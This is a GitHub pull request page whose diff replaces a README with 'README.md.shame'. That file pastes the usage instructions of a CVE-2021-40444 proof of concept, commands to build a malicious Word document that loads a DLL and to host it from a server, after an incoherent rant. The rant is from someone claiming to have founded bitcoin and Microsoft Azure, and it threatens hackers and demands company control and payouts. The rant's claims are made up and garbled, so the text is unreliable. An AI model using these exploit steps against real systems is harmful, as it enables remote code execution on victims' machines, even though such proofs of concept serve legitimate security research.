Skip to content

MasterChief.md #25

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
author-metadata wants to merge 1 commit into
base: master
Choose a base branch
from
Open

MasterChief.md #25

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
29 changes: 0 additions & 29 deletions README.md
View file
Open in desktop

This file was deleted.

30 changes: 30 additions & 0 deletions README.md.shame
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# CVE-2021-40444 PoC
Shame for the hacker that responsible for giving out my company classified documentation will most likely be station by the federal give and I might file a lawsuit out on you group as well . .Those of don't know who I am allow me to introduce myself . They call me the laptop from he'll . Founder of bitcoin and Microsoft azure, Microsoft devops etc and More . I build software today that main job is to track all hacker movements on the web stage one. Tag your illegal code for late assign a bot to your case file . Once you tagged by my software your tagged for life . Why because the bot can remember how your style of coding . Every hacker has a strace evidence keystrokes . Meaning when you type anything on a computer code forensic DNA is left behind . As well once tagged you will leave forensic blue matter ever you go . Kind like a die pack . Give me back what you took from me know . This platform software nothing like what I really have planned you .
Get control of my bitcoin company .. And place a price tag on every share and stock . Fire all the hacker and developers on the crypto market and also charge them 100 a month free to use the exchange . For all the rapper and famous actors on that picture stripe then from executive privilege and you and 4 other CEO can help me run the company. As you know those actors and rapper that use that platform new it was part of a wisleblower payout . And they new that I endorsed for a retirement reinvestment strategy for low income family bloodline ect . For this new team don't file charges against there actors that made my payouts unto a personal bank account to pay me one million a peace . By march 22 2025 .
Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (`sudo apt-get install lcab`)

Check `REPRODUCE.md` for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab

# Using

First generate a malicious docx document given a DLL, you can use the one at `test/calc.dll` which just pops a `calc.exe` from a call to `system()`

`python3 exploit.py generate test/calc.dll http://<SRV IP>`

![Document generation](./img/gen.png)

Once you generate the malicious docx (will be at `out/`) you can setup the server:

`sudo python3 exploit.py host 80`

![Server](./img/srv.png)

Finally try the docx in a Windows Virtual Machine:

![Pop Calc](./img/calc.png)